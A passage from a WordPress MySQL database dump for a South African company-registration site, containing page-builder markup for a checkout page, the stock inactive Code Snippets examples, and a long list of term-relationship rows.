admin_label=\"Text: Clinically Tested Formula\" _builder_version=\"3.26.3\" header_font=\"Poppins|500|||||||\" header_text_color=\"rgba(255,255,255,0.73)\" header_font_size=\"16px\" background_layout=\"dark\" custom_margin=\"||10px|\" custom_padding=\"||||false\" _i=\"1\" _address=\"0.0.1.1\"][/et_pb_blurb][et_pb_blurb title=\"100% Money back Guarantee\" use_icon=\"on\" font_icon=\"%%59%%\" icon_color=\"#dafa02\" icon_placement=\"left\" content_max_width=\"1100px\" use_icon_font_size=\"on\" icon_font_size=\"15px\" admin_label=\"Text: 100% Guaranteed Weight Gain\" _builder_version=\"3.26.3\" header_font=\"Poppins|500|||||||\" header_text_color=\"rgba(255,255,255,0.73)\" header_font_size=\"16px\" background_layout=\"dark\" custom_margin=\"||10px|\" custom_padding=\"||||false\" _i=\"2\" _address=\"0.0.1.2\"][/et_pb_blurb][et_pb_blurb title=\"Professional consultants ready to assist\" use_icon=\"on\" font_icon=\"%%59%%\" icon_color=\"#dafa02\" icon_placement=\"left\" content_max_width=\"1100px\" use_icon_font_size=\"on\" icon_font_size=\"15px\" admin_label=\"Text: Best Results For Regular Consumption\" _builder_version=\"3.26.3\" header_font=\"Poppins|500|||||||\" header_text_color=\"rgba(255,255,255,0.73)\" header_font_size=\"16px\" background_layout=\"dark\" custom_margin=\"||10px|\" custom_padding=\"||||false\" _i=\"3\" _address=\"0.0.1.3\"][/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.22\" fb_built=\"1\" _i=\"1\" _address=\"1\"][et_pb_row column_structure=\"3_5,2_5\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" custom_padding_last_edited=\"on|phone\" padding_top_bottom_link_2=\"true\" padding_left_right_link_1=\"true\" padding_left_right_link_2=\"true\" _builder_version=\"3.26.3\" border_radii=\"on|20px|20px|20px|20px\" border_width_all=\"1px\" border_color_all=\"rgba(255,255,255,0)\" box_shadow_style=\"preset1\" box_shadow_horizontal=\"-13px\" box_shadow_vertical=\"-11px\" box_shadow_blur=\"16px\" custom_margin=\"-174px||||false|false\" custom_padding=\"0px||120px||false|false\" custom_padding_tablet=\"||50px\" custom_padding_phone=\"||30px\" _i=\"0\" _address=\"1.0\"][et_pb_column type=\"3_5\" _builder_version=\"3.25\" background_color=\"#f9f9f9\" custom_padding=\"30px|40px|50px|40px\" custom_padding_tablet=\"|30px|30px|30px\" custom_padding_phone=\"20px|20px|20px|20px\" custom_padding_last_edited=\"on|desktop\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"1.0.0\"][et_pb_code admin_label=\"Checkout  Shortcode\" _builder_version=\"3.19.11\" _i=\"0\" _address=\"1.0.0.0\"][cartflows_checkout][/et_pb_code][/et_pb_column][et_pb_column type=\"2_5\" _builder_version=\"3.25\" background_color=\"#edeef2\" custom_padding=\"40px|40px|40px|40px\" custom_padding_tablet=\"30px|30px|30px|30px\" custom_padding_phone=\"20px|20px|20px|20px\" custom_padding_last_edited=\"on|phone\" custom_padding__hover=\"|||\" _i=\"1\" _address=\"1.0.1\"][et_pb_number_counter title=\"Companies registered by our consultants exceed\" number=\"3520\" percent_sign=\"off\" _builder_version=\"3.27.3\" title_font=\"Poppins||||||||\" number_text_shadow_style=\"preset1\" custom_padding=\"||10px||false|false\" hover_enabled=\"0\" _i=\"0\" _address=\"1.0.1.0\" number_font=\"Poppins||||||||\"][/et_pb_number_counter][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/satisfaction-guarantee-2109235_1280.png\" align=\"center\" align_tablet=\"center\" align_last_edited=\"on|desktop\" admin_label=\"Money Back Image\" _builder_version=\"3.27.3\" transform_translate=\"129px|0px\" max_width=\"30%\" module_alignment=\"left\" custom_margin=\"||20px|0px|false|false\" custom_padding=\"|||0px|false|false\" filter_hue_rotate=\"14deg\" filter_saturate=\"200%\" filter_brightness=\"107%\" filter_contrast=\"81%\" animation_style=\"slide\" animation_direction=\"right\" _i=\"1\" _address=\"1.0.1.1\"][/et_pb_image][et_pb_text admin_label=\"Headline and Text: 30 Days Full Refund Policy.\" _builder_version=\"3.26.3\" text_font=\"Poppins||||||||\" header_font=\"Poppins||||||||\" header_3_font=\"Poppins|500|||||||\" header_3_text_color=\"#242f6b\" header_3_font_size=\"18px\" header_3_line_height=\"1.4em\" custom_margin=\"||9px\" _i=\"2\" _address=\"1.0.1.2\"]<h3>100% Money Back. No-Risk.</h3>\r\n<h3>Full Refund Policy.</h3>\r\nNo Risk guarantee, if you not happy at any time, prior to registration of your company, we will refund you 100%, no questions asked.[/et_pb_text][et_pb_divider color=\"#000000\" divider_style=\"dashed\" divider_position=\"center\" _builder_version=\"3.19.7\" height=\"46px\" _i=\"3\" _address=\"1.0.1.3\"][/et_pb_divider][et_pb_text admin_label=\"Headline: Success Stories\" _builder_version=\"3.19.11\" text_font=\"Roboto||||||||\" header_font=\"||||||||\" header_3_font=\"Roboto|500|||||||\" header_3_text_color=\"#242f6b\" header_3_font_size=\"18px\" header_3_line_height=\"1.4em\" custom_margin=\"||9px\" _i=\"4\" _address=\"1.0.1.4\"]<h3>Success Stories</h3>[/et_pb_text][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/5stars-free-img.png\" align=\"center\" align_tablet=\"center\" align_last_edited=\"on|desktop\" admin_label=\"Star Image\" _builder_version=\"3.23\" max_width=\"20%\" module_alignment=\"left\" custom_margin=\"20px||10px||false|false\" filter_hue_rotate=\"22deg\" filter_saturate=\"200%\" filter_brightness=\"85%\" filter_contrast=\"172%\" _i=\"5\" _address=\"1.0.1.5\"][/et_pb_image][et_pb_text admin_label=\"Testimonial Text\" _builder_version=\"3.26.3\" text_font=\"Poppins||||||||\" text_text_color=\"#000000\" text_font_size=\"13px\" header_font=\"||||||||\" header_3_font=\"Roboto|500|||||||\" header_3_text_color=\"#242f6b\" header_3_font_size=\"18px\" header_3_line_height=\"1.4em\" custom_margin=\"||20px\" _i=\"6\" _address=\"1.0.1.6\"]<p>\"They have impressed me with their knowledge and efficiency. The professionals have always been very helpful to myself and my clients.”</p>[/et_pb_text][et_pb_blurb title=\"Gretchen Rose Matthews \" icon_placement=\"left\" admin_label=\"Testimonial: Image and Name\" module_class=\"testimonial-blurb\" _builder_version=\"3.26.3\" header_font=\"Roboto|700|||||||\" header_font_size=\"12px\" body_font=\"Roboto|100|||||||\" body_text_color=\"#636363\" body_font_size=\"12px\" body_line_height=\"1.3em\" custom_margin=\"-15px||||false|false\" _i=\"7\" _address=\"1.0.1.7\"]<p>Senior Consultant, Constructive Consulting Group (Pty) Ltd</p>[/et_pb_blurb][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/5stars-free-img.png\" align=\"center\" align_tablet=\"center\" align_last_edited=\"on|desktop\" admin_label=\"Star Image\" _builder_version=\"3.26.3\" max_width=\"20%\" module_alignment=\"left\" custom_margin=\"20px||10px||false|false\" filter_hue_rotate=\"22deg\" filter_saturate=\"200%\" filter_brightness=\"85%\" filter_contrast=\"172%\" _i=\"8\" _address=\"1.0.1.8\"][/et_pb_image][et_pb_text admin_label=\"Testimonial Text\" _builder_version=\"3.26.3\" text_font=\"Poppins||||||||\" text_text_color=\"#000000\" text_font_size=\"13px\" header_font=\"||||||||\" header_3_font=\"Roboto|500|||||||\" header_3_text_color=\"#242f6b\" header_3_font_size=\"18px\" header_3_line_height=\"1.4em\" custom_margin=\"||20px\" _i=\"9\" _address=\"1.0.1.9\"]<p>“companyregistration.online is one of the most dynamic, modest, modern, up to date and well informed service providers we have ever used”</p>[/et_pb_text][et_pb_blurb title=\"Silas Gidzha \" icon_placement=\"left\" admin_label=\"Testimonial: Image and Name\" module_class=\"testimonial-blurb\" _builder_version=\"3.26.3\" header_font=\"Roboto|700|||||||\" header_font_size=\"12px\" body_font=\"Roboto|100|||||||\" body_text_color=\"#636363\" body_font_size=\"12px\" body_line_height=\"1.3em\" custom_margin=\"-15px||||false|false\" _i=\"10\" _address=\"1.0.1.10\"]<p>CEO, S&amp;S Orthopedic Services (Pty)Ltd</p>[/et_pb_blurb][et_pb_divider color=\"#000000\" divider_style=\"dashed\" divider_position=\"center\" _builder_version=\"3.19.7\" height=\"46px\" custom_margin=\"||20px\" _i=\"11\" _address=\"1.0.1.11\"][/et_pb_divider][et_pb_text admin_label=\"Headline: Frequent Queries\" _builder_version=\"3.19.11\" text_font=\"Roboto||||||||\" header_font=\"||||||||\" header_3_font=\"Roboto|500|||||||\" header_3_text_color=\"#242f6b\" header_3_font_size=\"18px\" header_3_line_height=\"1.4em\" custom_margin=\"||9px\" _i=\"12\" _address=\"1.0.1.12\"]<h3>Frequent Queries</h3>[/et_pb_text][et_pb_accordion open_toggle_text_color=\"#242f6b\" open_toggle_background_color=\"#ffffff\" closed_toggle_text_color=\"rgba(36,47,107,0.8)\" closed_toggle_background_color=\"#ffffff\" admin_label=\"Accordion: FAQ\" _builder_version=\"3.26.3\" toggle_font=\"Roboto|500|||||||\" body_font=\"Roboto||||||||\" body_text_color=\"#000000\" border_color_all=\"#f2f2f2\" _i=\"13\" _address=\"1.0.1.13\"][et_pb_accordion_item title=\"Where are your offices located?\" open=\"on\" icon_color=\"#242f6b\" _builder_version=\"3.26.3\" _i=\"0\" _address=\"1.0.1.13.0\"]<p>101 Rose Avenue, Lenasia, Johannesburg, 1827. Call 010 592 7717</p>[/et_pb_accordion_item][et_pb_accordion_item title=\"What do I need to register my company ?\" icon_color=\"#242f6b\" _builder_version=\"3.26.3\" _i=\"1\" _address=\"1.0.1.13.1\" open=\"off\"]<p>Once the order is made an email will be sent containg all the all the requirements</p>[/et_pb_accordion_item][et_pb_accordion_item title=\"How long does it take to register?\" icon_color=\"#242f6b\" _builder_version=\"3.26.3\" _i=\"2\" _address=\"1.0.1.13.2\" open=\"off\"]<p>Typically it takes between 3-5days, CIPC delays may extend the duration</p>[/et_pb_accordion_item][/et_pb_accordion][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.26.3\" fb_built=\"1\" _i=\"2\" _address=\"2\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"3.26.3\" custom_margin=\"-43px||||false|false\" _i=\"0\" _address=\"2.0\"][et_pb_column type=\"1_2\" _builder_version=\"3.26.3\" _i=\"0\" _address=\"2.0.0\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/06/companyregistration-web-e1563787290497.png\" _builder_version=\"3.26.3\" width=\"54%\" max_width=\"54%\" _i=\"0\" _address=\"2.0.0.0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.26.3\" _i=\"1\" _address=\"2.0.1\"][et_pb_text _builder_version=\"3.27.3\" _i=\"0\" _address=\"2.0.1.0\"]<p style=\"text-align: right;\">@2018</p>\n<p style=\"text-align: right;\">Powered By: Digital Niche Marketing (Pty) Ltd</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','SA Company Registration Checkout','','inherit','closed','closed','','31362-revision-v1','','','2019-08-26 15:48:12','2019-08-26 13:48:12','',31362,'https://companyregistration.online/31362-revision-v1/',0,'revision','',0);
/*!40000 ALTER TABLE `wpxb_posts` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_snippets`
--

DROP TABLE IF EXISTS `wpxb_snippets`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_snippets` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `name` tinytext COLLATE utf8mb4_unicode_ci NOT NULL,
  `description` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `code` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `tags` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `scope` varchar(15) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'global',
  `priority` smallint(6) NOT NULL DEFAULT 10,
  `active` tinyint(1) NOT NULL DEFAULT 0,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=5 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_snippets`
--

LOCK TABLES `wpxb_snippets` WRITE;
/*!40000 ALTER TABLE `wpxb_snippets` DISABLE KEYS */;
INSERT INTO `wpxb_snippets` VALUES (1,'Example HTML shortcode','This is an example snippet for demonstrating how to add an HTML shortcode. You can remove it, or edit it to add your own content.','\nadd_shortcode( \'shortcode_name\', function () {\n\n	$out = \'<p>write your HTML shortcode content here</p>\';\n\n	return $out;\n} );','shortcode','global',10,0),(2,'Example CSS snippet','This is an example snippet for demonstrating how to add custom CSS code to your website. You can remove it, or edit it to add your own content.','\nadd_action( \'wp_head\', function () { ?>\n	<style>\n\n		/* write your CSS code here */\n\n	</style>\n<?php } );\n','css','front-end',10,0),(3,'Example JavaScript snippet','This is an example snippet for demonstrating how to add custom JavaScript code to your website. You can remove it, or edit it to add your own content.','\nadd_action( \'wp_head\', function () { ?>\n	<script>\n\n		/* write your JavaScript code here */\n\n	</script>\n<?php } );\n','javascript','front-end',10,0),(4,'Order snippets by name','Order snippets by name by default in the snippets table. You can remove it, or edit it to add your own content.','\nadd_filter( \'code_snippets/list_table/default_orderby\', function () {\n	return \'name\';\n} );\n','code-snippets-plugin','admin',10,0);
/*!40000 ALTER TABLE `wpxb_snippets` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_term_relationships`
--

DROP TABLE IF EXISTS `wpxb_term_relationships`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_term_relationships` (
  `object_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `term_taxonomy_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `term_order` int(11) NOT NULL DEFAULT 0,
  PRIMARY KEY (`object_id`,`term_taxonomy_id`),
  KEY `term_taxonomy_id` (`term_taxonomy_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_term_relationships`
--

LOCK TABLES `wpxb_term_relationships` WRITE;
/*!40000 ALTER TABLE `wpxb_term_relationships` DISABLE KEYS */;
INSERT INTO `wpxb_term_relationships` VALUES (2,2,0),(4,2,0),(5,2,0),(6,2,0),(7,2,0),(28,3,0),(28,7,0),(28,10,0),(28,11,0),(28,12,0),(28,153,0),(30,13,0),(31,13,0),(32,13,0),(33,13,0),(34,13,0),(36,15,0),(45,14,0),(59,3,0),(59,7,0),(59,11,0),(59,51,0),(59,52,0),(59,53,0),(59,153,0),(62,3,0),(62,7,0),(62,11,0),(62,44,0),(62,45,0),(64,3,0),(64,7,0),(64,46,0),(64,47,0),(64,48,0),(64,49,0),(64,50,0),(65,3,0),(65,9,0),(65,60,0),(65,61,0),(65,62,0),(65,63,0),(67,3,0),(67,9,0),(67,60,0),(67,64,0),(67,65,0),(67,66,0),(67,67,0),(68,3,0),(68,9,0),(68,60,0),(68,68,0),(69,3,0),(69,9,0),(69,60,0),(69,64,0),(69,68,0),(69,69,0),(70,3,0),(70,9,0),(70,92,0),(70,101,0),(70,102,0),(70,103,0),(71,3,0),(71,9,0),(71,89,0),(71,90,0),(71,91,0),(71,92,0),(71,93,0),(72,3,0),(72,9,0),(72,92,0),(72,94,0),(72,95,0),(73,3,0),(73,9,0),(73,96,0),(73,97,0),(73,98,0),(73,99,0),(73,100,0),(74,3,0),(74,8,0),(74,82,0),(74,83,0),(74,84,0),(75,3,0),(75,8,0),(75,85,0),(75,86,0),(75,87,0),(75,88,0),(76,3,0),(76,8,0),(76,79,0),(76,80,0),(76,81,0),(76,153,0),(77,3,0),(77,8,0),(77,73,0),(77,74,0),(77,75,0),(77,76,0),(78,3,0),(78,8,0),(78,70,0),(78,71,0),(78,72,0),(79,3,0),(79,16,0),(79,57,0),(79,58,0),(79,59,0),(79,108,0),(79,109,0),(79,110,0),(80,3,0),(80,17,0),(80,54,0),(80,55,0),(80,56,0),(80,76,0),(80,135,0),(80,136,0),(80,137,0),(80,139,0),(80,140,0),(80,141,0),(80,142,0),(80,143,0),(80,144,0),(80,145,0),(83,39,0),(91,39,0),(96,39,0),(99,39,0),(103,39,0),(105,39,0),(109,39,0),(112,39,0),(114,39,0),(118,39,0),(122,39,0),(122,43,0),(124,39,0),(128,39,0),(132,39,0),(134,39,0),(136,39,0),(136,42,0),(144,39,0),(144,40,0),(144,41,0),(147,14,0),(173,14,0),(186,13,0),(191,14,0),(192,14,0),(237,3,0),(237,8,0),(237,73,0),(237,74,0),(237,75,0),(237,76,0),(237,77,0),(237,78,0),(237,153,0),(243,14,0),(267,39,0),(267,104,0),(267,105,0),(267,106,0),(267,107,0),(297,15,0),(298,15,0),(309,111,0),(309,116,0),(309,117,0),(309,118,0),(314,1,0),(314,118,0),(314,119,0),(314,120,0),(319,112,0),(319,118,0),(319,121,0),(319,122,0),(322,113,0),(322,118,0),(322,126,0),(322,127,0),(322,128,0),(322,129,0),(324,113,0),(324,118,0),(324,123,0),(324,124,0),(324,125,0),(329,39,0),(329,113,0),(329,118,0),(329,130,0),(329,131,0),(335,39,0),(335,113,0),(335,118,0),(335,124,0),(335,132,0),(335,133,0),(335,134,0),(357,39,0),(369,39,0),(397,39,0),(566,39,0),(3335,147,0),(3335,148,0),(3335,149,0),(3357,147,0),(3357,148,0),(3357,149,0),(3369,147,0),(3369,148,0),(3369,149,0),(3896,147,0),(3896,148,0),(3896,149,0),(3897,147,0),(3897,148,0),(3897,149,0),(3898,147,0),(3898,148,0),(3898,149,0),(3899,147,0),(3899,148,0),(3899,149,0),(3900,147,0),(3900,148,0),(3900,149,0),(3901,147,0),(3901,148,0),(3901,149,0),(3902,147,0),(3902,148,0),(3902,149,0),(3903,147,0),(3903,148,0),(3903,149,0),(3904,147,0),(3904,148,0),(3904,149,0),(3905,147,0),(3905,148,0),(3905,149,0),(5070,147,0),(5070,148,0),(5070,149,0),(5728,148,0),(5728,149,0),(5728,150,0),(5729,148,0),(5729,149,0),(5729,150,0),(5731,148,0),(5731,149,0),(5731,150,0),(5733,148,0),(5733,149,0),(5733,150,0),(5734,148,0),(5734,149,0),(5734,150,0),(5735,148,0),(5735,149,0),(5735,150,0),(5736,148,0),(5736,149,0),(5736,150,0),(5737,148,0),(5737,149,0),(5737,150,0),(5738,148,0),(5738,149,0),(5738,150,0),(5739,148,0),(5739,149,0),(5739,150,0),(5740,148,0),(5740,149,0),(5740,150,0),(5741,148,0),(5741,149,0),(5741,150,0),(5744,148,0),(5744,149,0),(5744,150,0),(5745,148,0),(5745,149,0),(5745,150,0),(5746,148,0),(5746,149,0),(5746,150,0),(5747,148,0),(5747,149,0),(5747,150,0),(24564,148,0),(24564,149,0),(24564,150,0),(24565,148,0),(24565,149,0),(24565,150,0),(24566,148,0),(24566,149,0),(24566,150,0),(24567,148,0),(24567,149,0),(24567,150,0),(24568,148,0),(24568,149,0),(24568,150,0),(24573,148,0),(24573,149,0),(24573,150,0),(25341,147,0),(25341,148,0),(25341,149,0),(25343,147,0),(25343,148,0),(25343,149,0),(25349,147,0),(25349,148,0),(25349,149,0),(26701,147,0),(26701,148,0),(26701,149,0),(26792,147,0),(26792,148,0),(26792,149,0),(26793,147,0),(26793,148,0),(26793,149,0),(27814,147,0),(27814,148,0),(27814,149,0),(27815,147,0),(27815,148,0),(27815,149,0),(28088,3,0),(28088,10,0),(28088,18,0),(28088,81,0),(28088,161,0),(28088,162,0),(28088,163,0),(28090,3,0),(28090,10,0),(28090,18,0),(28090,81,0),(28090,161,0),(28090,162,0),(28090,163,0),(28091,3,0),(28091,10,0),(28091,18,0),(28091,81,0),(28091,153,0),(28091,161,0),(28091,162,0),(28091,163,0),(28091,164,0),(28091,166,0),(28092,3,0),(28092,10,0),(28092,18,0),(28092,81,0),(28092,161,0),(28092,162,0),(28092,163,0),(28092,164,0),(28092,165,0),(28092,166,0),(28092,167,0),(28304,148,0),(28304,149,0),(28304,150,0),(28944,148,0),(28944,149,0),(28944,169,0),(29115,148,0),(29115,149,0),(29115,169,0),(29377,148,0),(29377,149,0),(29377,169,0),(29378,148,0),(29378,149,0),(29378,169,0),(29379,148,0),(29379,149,0),(29379,150,0),(29380,148,0),(29380,149,0),(29380,150,0),(29381,148,0),(29381,149,0),(29381,169,0),(29382,148,0),(29382,149,0),(29382,169,0),(29443,148,0),(29443,149,0),(29443,169,0),(29583,3,0),(29583,17,0),(29583,173,0),(29583,174,0),(29583,180,0),(32945,178,0),(32946,178,0),(29681,3,0),(29681,17,0),(29681,173,0),(29681,174,0),(29681,180,0),(29765,4,0),(29765,18,0),(29765,153,0),(30086,148,0),(30086,149,0),(30086,150,0),(30118,3,0),(30118,7,0),(30118,187,0),(32947,178,0),(32948,178,0),(32951,178,0),(32952,178,0),(32949,178,0),(32950,178,0),(31327,3,0),(31327,9,0),(33051,178,0),(31327,190,0),(31327,92,0),(33050,178,0),(33047,178,0),(33061,178,0),(31331,188,0),(31327,96,0),(31327,191,0),(32953,178,0),(32954,178,0),(32955,178,0),(32956,178,0),(33163,178,0),(33164,178,0),(33185,178,0),(33186,178,0),(33183,178,0),(33184,178,0),(33181,178,0),(33182,178,0),(33179,178,0),(33180,178,0),(33177,178,0),(33178,178,0),(33175,178,0),(33176,178,0),(33173,178,0),(33174,178,0),(33171,178,0),(33172,178,0),(33169,178,0),(33170,178,0),(33165,178,0),(33166,178,0),(33167,178,0),(33084,178,0),(32957,178,0),(33168,178,0),(33161,178,0),(33162,178,0),(33157,178,0),(33158,178,0),(33155,178,0),(33156,178,0),(33153,178,0),(33154,178,0),(33151,178,0),(33152,178,0),(33149,178,0),(33150,178,0),(33123,178,0),(33124,178,0),(33101,178,0),(33102,178,0),(33103,178,0),(33104,178,0),(33099,178,0),(33100,178,0),(33097,178,0),(33098,178,0),(33094,178,0),(33095,178,0),(33092,178,0),(33093,178,0),(33090,178,0),(33091,178,0),(33088,178,0),(33089,178,0),(33086,178,0),(33087,178,0),(32958,178,0),(33085,178,0),(33082,178,0),(33083,178,0),(33080,178,0),(33081,178,0),(31362,189,0),(31362,182,0),(33078,178,0),(33079,178,0),(33076,178,0),(33077,178,0),(33074,178,0),(33075,178,0),(33072,178,0),(33073,178,0),(33070,178,0),(33071,178,0),(33127,176,0),(33128,176,0),(33068,178,0),(33069,178,0),(33066,178,0),(33067,178,0),(33062,178,0),(33045,178,0),(33063,178,0),(33058,178,0),(33059,178,0),(33056,178,0),(33057,178,0),(33060,178,0),(33046,178,0),(31390,189,0),(31390,183,0),(33054,178,0),(33055,178,0),(33052,178,0),(33053,178,0),(33048,178,0),(33049,178,0),(33044,178,0),(32959,178,0),(32960,178,0),(33042,178,0),(33043,178,0),(33040,178,0),(33041,178,0),(33064,178,0),(33065,178,0),(33036,178,0),(33037,178,0),(33034,178,0),(33035,178,0),(33032,178,0),(33033,178,0),(33038,178,0),(32961,178,0),(32962,178,0),(33039,178,0),(33030,178,0),(33031,178,0),(33129,176,0),(33029,178,0),(31495,192,0),(33131,182,0),(32963,178,0),(32964,178,0),(33028,178,0),(31495,149,0),(31495,148,0),(32965,178,0),(32966,178,0),(31495,147,0),(33024,178,0),(33025,178,0),(32969,178,0),(32970,178,0),(33026,178,0),(33027,178,0),(32978,178,0),(32979,178,0),(33022,178,0),(33023,178,0),(33019,178,0),(33020,178,0),(33017,178,0),(33018,178,0),(33015,178,0),(33016,178,0),(33013,178,0),(32967,178,0),(32968,178,0),(33014,178,0),(33011,178,0),(33012,178,0),(33009,178,0),(33010,178,0),(32980,178,0),(32981,178,0),(32982,178,0),(32983,178,0),(33007,178,0),(33008,178,0),(33005,178,0),(33003,178,0),(33006,178,0),(33004,178,0),(32985,178,0),(32984,178,0),(32995,178,0),(32996,178,0),(31227,14,0),(33001,178,0),(32999,178,0),(33002,178,0),(33000,178,0),(32997,178,0),(32991,178,0),(32998,178,0),(32992,178,0),(31238,188,0),(31239,188,0),(31240,188,0),(31241,188,0),(31242,188,0),(31243,188,0),(31244,188,0),(31245,188,0),(31246,188,0),(31247,188,0),(31248,188,0),(32993,178,0),(32994,178,0),(31251,188,0),(31252,188,0),(31253,188,0),(31254,188,0),(31255,188,0),(31256,188,0),(31257,188,0),(31258,188,0),(31259,188,0),(31260,188,0),(31261,188,0),(31262,188,0),(31263,188,0),(31264,188,0),(31265,188,0),(31266,188,0),(31267,188,0),(31268,188,0),(31269,188,0),(31271,188,0),(31272,188,0),(31273,188,0),(31274,188,0),(31275,188,0),(31276,188,0),(31277,188,0),(32944,178,0),(32943,178,0),(33200,178,0),(33199,178,0),(33188,178,0),(33187,178,0),(33190,178,0),(33189,178,0),(33192,178,0),(33191,178,0),(33194,178,0),(33193,178,0),(33196,178,0),(33195,178,0),(33198,178,0),(33197,178,0),(33202,178,0),(33201,178,0),(33204,178,0),(33203,178,0),(33208,178,0),(33207,178,0),(33206,178,0),(33205,178,0),(33210,178,0),(33209,178,0),(33212,178,0),(33211,178,0),(33214,178,0),(33213,178,0),(33216,178,0),(33215,178,0),(33218,178,0),(33217,178,0),(33221,178,0),(33220,178,0),(33231,179,0),(33229,171,0),(33243,178,0),(33242,178,0),(33245,178,0),(33244,178,0),(33247,178,0),(33246,178,0),(33249,178,0),(33248,178,0),(33285,178,0),(33284,178,0),(33251,178,0),(33250,178,0),(33253,178,0),(33252,178,0),(33255,178,0),(33254,178,0),(33257,178,0),(33256,178,0),(33261,178,0),(33260,178,0),(33259,178,0),(33258,178,0),(33263,178,0),(33262,178,0),(33265,178,0),(33264,178,0),(33269,178,0),(33268,178,0),(33267,178,0),(33266,178,0),(33271,178,0),(33270,178,0),(33279,178,0),(33278,178,0),(33273,178,0),(33272,178,0),(31746,148,0),(31746,194,0),(31746,149,0),(33275,178,0),(33274,178,0),(31752,148,0),(31752,150,0),(31752,149,0),(33277,178,0),(33276,178,0),(33281,178,0),(33280,178,0),(33283,178,0),(33282,178,0),(33287,178,0),(33286,178,0),(33334,198,0),(33334,197,0),(33289,178,0),(33288,178,0),(33291,178,0),(33290,178,0),(33334,164,0),(33334,9,0),(33293,178,0),(33292,178,0),(33318,178,0),(33317,178,0),(33295,178,0),(33294,178,0),(33297,178,0),(33296,178,0),(33299,178,0),(33298,178,0),(33301,178,0),(33300,178,0),(33303,178,0),(33302,178,0),(33305,178,0),(33304,178,0),(33314,178,0),(33313,178,0),(33320,178,0),(33319,178,0),(33322,178,0),(33321,178,0),(33324,178,0),(33323,178,0),(33332,178,0),(33331,178,0),(33337,178,0),(33336,178,0),(33339,178,0),(33338,178,0),(33341,178,0),(33340,178,0),(33343,178,0),(33342,178,0),(33345,178,0),(33344,178,0),(33347,178,0),(33346,178,0),(33349,178,0),(33348,178,0),(33351,178,0),(33350,178,0),(33353,178,0),(33352,178,0),(33355,178,0),(33354,178,0),(33365,178,0),(33364,178,0),(33357,178,0),(33356,178,0),(33359,178,0),(33358,178,0),(33361,178,0),(33360,178,0),(33363,178,0),(33362,178,0),(33367,178,0),(33366,178,0),(31839,178,0),(31840,178,0),(31841,178,0),(31842,178,0),(31843,178,0),(31844,178,0),(31845,178,0),(31846,178,0),(31847,178,0),(31848,178,0),(31849,178,0),(31850,178,0),(31851,178,0),(31852,178,0),(31853,178,0),(31854,178,0),(31855,178,0),(31856,178,0),(31857,178,0),(31858,178,0),(31859,178,0),(31860,178,0),(31861,178,0),(31862,178,0),(31863,178,0),(31864,178,0),(31865,178,0),(31866,178,0),(31867,178,0),(31868,178,0),(31869,178,0),(31870,178,0),(31871,178,0),(31872,178,0),(31873,178,0),(31874,178,0),(31875,178,0),(31876,178,0),(31877,178,0),(31878,178,0),(31879,178,0),(31880,178,0),(31881,178,0),(31882,178,0),(31883,178,0),(31884,178,0),(31885,178,0),(31886,178,0),(31887,178,0),(31888,178,0),(31889,178,0),(31890,178,0),(31891,178,0),(31892,178,0),(31893,178,0),(31894,178,0),(31895,178,0),(31896,178,0),(31897,178,0),(31898,178,0),(31899,178,0),(31900,178,0),(31901,178,0),(31902,178,0),(31903,178,0),(31904,178,0),(31905,148,0),(31905,147,0),(31905,149,0),(31914,178,0),(31915,178,0),(31925,178,0),(31926,178,0),(31927,178,0),(31928,178,0),(31929,178,0),(31930,178,0),(31931,178,0),(31932,178,0),(31933,178,0),(31934,178,0),(31935,178,0),(31936,178,0),(31941,178,0),(31942,178,0),(31943,178,0),(31944,178,0),(31945,178,0),(31946,178,0),(31947,178,0),(31948,178,0),(31949,178,0),(31950,178,0),(31951,178,0),(31952,178,0),(31953,178,0),(31954,178,0),(31955,178,0),(31956,178,0),(31957,178,0),(31958,178,0),(31959,178,0),(31960,178,0),(31961,178,0),(31962,178,0),(31963,178,0),(31964,178,0),(31965,178,0),(31966,178,0),(31967,178,0),(31968,178,0),(31969,178,0),(31970,178,0),(31971,178,0),(31972,178,0),(31973,178,0),(31974,178,0),(31975,178,0),(31976,178,0),(31977,178,0),(31978,178,0),(31979,178,0),(31980,178,0),(31981,178,0),(31982,178,0),(31983,178,0),(31984,178,0),(31985,178,0),(31986,178,0),(31987,178,0),(31988,178,0),(31989,178,0),(31990,178,0),(31991,178,0),(31992,178,0),(31994,178,0),(31995,178,0),(31996,178,0),(31997,178,0),(31998,178,0),(31999,178,0),(32000,178,0),(32001,178,0),(32002,178,0),(32003,178,0),(32004,178,0),(32005,178,0),(32006,178,0),(32007,178,0),(32008,178,0),(32009,178,0),(32010,178,0),(32011,178,0),(32012,178,0),(32013,178,0),(32014,178,0),(32015,178,0),(32016,178,0),(32017